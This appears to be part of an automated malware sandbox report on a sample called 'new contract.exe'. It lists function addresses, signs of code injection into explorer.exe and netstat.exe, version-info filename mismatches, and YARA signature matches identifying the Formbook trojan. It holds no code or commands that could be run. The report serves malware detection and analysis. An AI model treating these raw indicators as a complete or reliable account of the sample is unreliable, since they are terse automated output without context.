Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_00409E4D 2_2_00409E4D
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_00409E50 2_2_00409E50
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0041D734 2_2_0041D734
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_00402FB0 2_2_00402FB0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016B8158 2_2_016B8158
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01620100 2_2_01620100
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016CA118 2_2_016CA118
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016E81CC 2_2_016E81CC
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016F01AA 2_2_016F01AA
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016E41A2 2_2_016E41A2
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016C2000 2_2_016C2000
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016EA352 2_2_016EA352
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016F03E6 2_2_016F03E6
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0163E3F0 2_2_0163E3F0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016D0274 2_2_016D0274
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016B02C0 2_2_016B02C0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01630535 2_2_01630535
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016F0591 2_2_016F0591
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016E2446 2_2_016E2446
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016D4420 2_2_016D4420
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016DE4F6 2_2_016DE4F6
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01630770 2_2_01630770
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01654750 2_2_01654750
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0162C7C0 2_2_0162C7C0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164C6E0 2_2_0164C6E0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01646962 2_2_01646962
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016329A0 2_2_016329A0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016FA9A6 2_2_016FA9A6
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0163A840 2_2_0163A840
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01632840 2_2_01632840
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0165E8F0 2_2_0165E8F0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016168B8 2_2_016168B8
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016EAB40 2_2_016EAB40
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016E6BD7 2_2_016E6BD7
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0162EA80 2_2_0162EA80
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0163AD00 2_2_0163AD00
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016CCD1F 2_2_016CCD1F
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0162ADE0 2_2_0162ADE0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01648DBF 2_2_01648DBF
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01630C00 2_2_01630C00
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01620CF2 2_2_01620CF2
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016D0CB5 2_2_016D0CB5
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A4F40 2_2_016A4F40
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01672F28 2_2_01672F28
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01650F30 2_2_01650F30
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016D2F30 2_2_016D2F30
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01622FC8 2_2_01622FC8
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016AEFA0 2_2_016AEFA0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01630E59 2_2_01630E59
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016EEE26 2_2_016EEE26
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016EEEDB 2_2_016EEEDB
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01642E90 2_2_01642E90
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016ECE93 2_2_016ECE93
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016FB16B 2_2_016FB16B
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0166516C 2_2_0166516C
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0161F172 2_2_0161F172
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0163B1B0 2_2_0163B1B0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016E70E9 2_2_016E70E9
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016EF0E0 2_2_016EF0E0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016DF0CC 2_2_016DF0CC
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016370C0 2_2_016370C0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0161D34C 2_2_0161D34C
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016E132D 2_2_016E132D
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0167739A 2_2_0167739A
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016D12ED 2_2_016D12ED
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164D2F0 2_2_0164D2F0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164B2C0 2_2_0164B2C0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016352A0 2_2_016352A0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016E7571 2_2_016E7571
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016F95C3 2_2_016F95C3
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016CD5B0 2_2_016CD5B0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01621460 2_2_01621460
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016EF43F 2_2_016EF43F
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016EF7B0 2_2_016EF7B0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01675630 2_2_01675630
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016E16CC 2_2_016E16CC
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01639950 2_2_01639950
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164B950 2_2_0164B950
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016C5910 2_2_016C5910
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0169D800 2_2_0169D800
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016338E0 2_2_016338E0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016EFB76 2_2_016EFB76
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A5BF0 2_2_016A5BF0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0166DBF9 2_2_0166DBF9
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164FB80 2_2_0164FB80
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A3A6C 2_2_016A3A6C
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016EFA49 2_2_016EFA49
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016E7A46 2_2_016E7A46
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016DDAC6 2_2_016DDAC6
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016CDAAC 2_2_016CDAAC
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01675AA0 2_2_01675AA0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016D1AA3 2_2_016D1AA3
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016E7D73 2_2_016E7D73
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01633D40 2_2_01633D40
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016E1D5A 2_2_016E1D5A
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_0164FDC0 2_2_0164FDC0
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016A9C32 2_2_016A9C32
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016EFCF2 2_2_016EFCF2
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016EFF09 2_2_016EFF09
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_015F3FD5 2_2_015F3FD5
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_015F3FD2 2_2_015F3FD2
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_016EFFB1 2_2_016EFFB1
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01631F92 2_2_01631F92
Source: C:\Users\user\Desktop\new contract.exe Code function: 2_2_01639EB0 2_2_01639EB0
Source: C:\Windows\explorer.exe Code function: 3_2_0E4E3232 3_2_0E4E3232
Source: C:\Windows\explorer.exe Code function: 3_2_0E4E2036 3_2_0E4E2036
Source: C:\Windows\explorer.exe Code function: 3_2_0E4D9082 3_2_0E4D9082
Source: C:\Windows\explorer.exe Code function: 3_2_0E4DAD02 3_2_0E4DAD02
Source: C:\Windows\explorer.exe Code function: 3_2_0E4E0912 3_2_0E4E0912
Source: C:\Windows\explorer.exe Code function: 3_2_0E4DDB30 3_2_0E4DDB30
Source: C:\Windows\explorer.exe Code function: 3_2_0E4DDB32 3_2_0E4DDB32
Source: C:\Windows\explorer.exe Code function: 3_2_0E4E65CD 3_2_0E4E65CD
Source: C:\Windows\explorer.exe Code function: 3_2_0FB3CB32 3_2_0FB3CB32
Source: C:\Windows\explorer.exe Code function: 3_2_0FB3CB30 3_2_0FB3CB30
Source: C:\Windows\explorer.exe Code function: 3_2_0FB42232 3_2_0FB42232
Source: C:\Windows\explorer.exe Code function: 3_2_0FB455CD 3_2_0FB455CD
Source: C:\Windows\explorer.exe Code function: 3_2_0FB3F912 3_2_0FB3F912
Source: C:\Windows\explorer.exe Code function: 3_2_0FB39D02 3_2_0FB39D02
Source: C:\Windows\explorer.exe Code function: 3_2_0FB38082 3_2_0FB38082
Source: C:\Windows\explorer.exe Code function: 3_2_0FB41036 3_2_0FB41036
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_00682167 5_2_00682167
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_00681715 5_2_00681715
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0320A352 5_2_0320A352
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_032103E6 5_2_032103E6
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0315E3F0 5_2_0315E3F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031F0274 5_2_031F0274
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031D02C0 5_2_031D02C0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031EA118 5_2_031EA118
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03140100 5_2_03140100
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031D8158 5_2_031D8158
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_032101AA 5_2_032101AA
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_032081CC 5_2_032081CC
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031E2000 5_2_031E2000
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03174750 5_2_03174750
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03150770 5_2_03150770
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0314C7C0 5_2_0314C7C0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0316C6E0 5_2_0316C6E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03150535 5_2_03150535
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03210591 5_2_03210591
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031F4420 5_2_031F4420
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03202446 5_2_03202446
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031FE4F6 5_2_031FE4F6
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0320AB40 5_2_0320AB40
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03206BD7 5_2_03206BD7
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0314EA80 5_2_0314EA80
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03166962 5_2_03166962
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0321A9A6 5_2_0321A9A6
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031529A0 5_2_031529A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03152840 5_2_03152840
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0315A840 5_2_0315A840
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031368B8 5_2_031368B8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0317E8F0 5_2_0317E8F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03170F30 5_2_03170F30
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031F2F30 5_2_031F2F30
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03192F28 5_2_03192F28
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031C4F40 5_2_031C4F40
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031CEFA0 5_2_031CEFA0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03142FC8 5_2_03142FC8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0320EE26 5_2_0320EE26
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03150E59 5_2_03150E59
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03162E90 5_2_03162E90
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0320CE93 5_2_0320CE93
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0320EEDB 5_2_0320EEDB
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031ECD1F 5_2_031ECD1F
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0315AD00 5_2_0315AD00
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03168DBF 5_2_03168DBF
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0314ADE0 5_2_0314ADE0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03150C00 5_2_03150C00
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031F0CB5 5_2_031F0CB5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03140CF2 5_2_03140CF2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0320132D 5_2_0320132D
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0313D34C 5_2_0313D34C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0319739A 5_2_0319739A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031552A0 5_2_031552A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0316B2C0 5_2_0316B2C0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0316D2F0 5_2_0316D2F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031F12ED 5_2_031F12ED
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0321B16B 5_2_0321B16B
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0313F172 5_2_0313F172
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0318516C 5_2_0318516C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0315B1B0 5_2_0315B1B0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0320F0E0 5_2_0320F0E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_032070E9 5_2_032070E9
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031FF0CC 5_2_031FF0CC
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031570C0 5_2_031570C0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0320F7B0 5_2_0320F7B0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_032016CC 5_2_032016CC
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03207571 5_2_03207571
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031ED5B0 5_2_031ED5B0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0320F43F 5_2_0320F43F
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03141460 5_2_03141460
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0320FB76 5_2_0320FB76
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0316FB80 5_2_0316FB80
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0318DBF9 5_2_0318DBF9
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031C5BF0 5_2_031C5BF0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03207A46 5_2_03207A46
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0320FA49 5_2_0320FA49
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031C3A6C 5_2_031C3A6C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031EDAAC 5_2_031EDAAC
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03195AA0 5_2_03195AA0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031F1AA3 5_2_031F1AA3
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031FDAC6 5_2_031FDAC6
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031E5910 5_2_031E5910
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03159950 5_2_03159950
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0316B950 5_2_0316B950
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031BD800 5_2_031BD800
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031538E0 5_2_031538E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0320FF09 5_2_0320FF09
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03151F92 5_2_03151F92
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0320FFB1 5_2_0320FFB1
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03159EB0 5_2_03159EB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03207D73 5_2_03207D73
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03153D40 5_2_03153D40
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_03201D5A 5_2_03201D5A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0316FDC0 5_2_0316FDC0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_031C9C32 5_2_031C9C32
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0320FCF2 5_2_0320FCF2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0052E1C7 5_2_0052E1C7
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0052E5A5 5_2_0052E5A5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0052D734 5_2_0052D734
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0052E803 5_2_0052E803
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_0052DD0B 5_2_0052DD0B
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_00512D90 5_2_00512D90
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_00512D88 5_2_00512D88
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_00519E50 5_2_00519E50
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_00519E4D 5_2_00519E4D
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_00512FB0 5_2_00512FB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02DBA036 5_2_02DBA036
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02DBB232 5_2_02DBB232
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02DB5B32 5_2_02DB5B32
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02DB5B30 5_2_02DB5B30
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02DB1082 5_2_02DB1082
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02DB8912 5_2_02DB8912
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02DBE5CD 5_2_02DBE5CD
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02DB2D02 5_2_02DB2D02
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 03197E54 appears 99 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 031CF290 appears 103 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 031BEA12 appears 86 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 03185130 appears 58 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 0313B970 appears 262 times
Source: C:\Users\user\Desktop\new contract.exe Code function: String function: 01677E54 appears 107 times
Source: C:\Users\user\Desktop\new contract.exe Code function: String function: 016AF290 appears 103 times
Source: C:\Users\user\Desktop\new contract.exe Code function: String function: 01665130 appears 58 times
Source: C:\Users\user\Desktop\new contract.exe Code function: String function: 0161B970 appears 262 times
Source: C:\Users\user\Desktop\new contract.exe Code function: String function: 0169EA12 appears 86 times
Sample file is different than original file name gathered from version info
Source: new contract.exe, 00000000.00000002.1740008298.000000000126E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs new contract.exe
Source: new contract.exe, 00000000.00000002.1744485602.0000000008E80000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs new contract.exe
Source: new contract.exe, 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs new contract.exe
Source: new contract.exe, 00000002.00000002.1806754751.000000000119E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenetstat.exej% vs new contract.exe
Source: new contract.exe, 00000002.00000002.1806931076.000000000171D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs new contract.exe
Source: new contract.exe, 00000002.00000002.1806662425.0000000001130000.00000040.10000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenamenetstat.exej% vs new contract.exe
Source: new contract.exe Binary or memory string: OriginalFilenameQTW.exe6 vs new contract.exe
Uses 32bit PE files
Source: new contract.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 2.2.new contract.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.new contract.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.new contract.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.new contract.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.new contract.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.new contract.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.4129188271.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.4129188271.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.4129188271.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
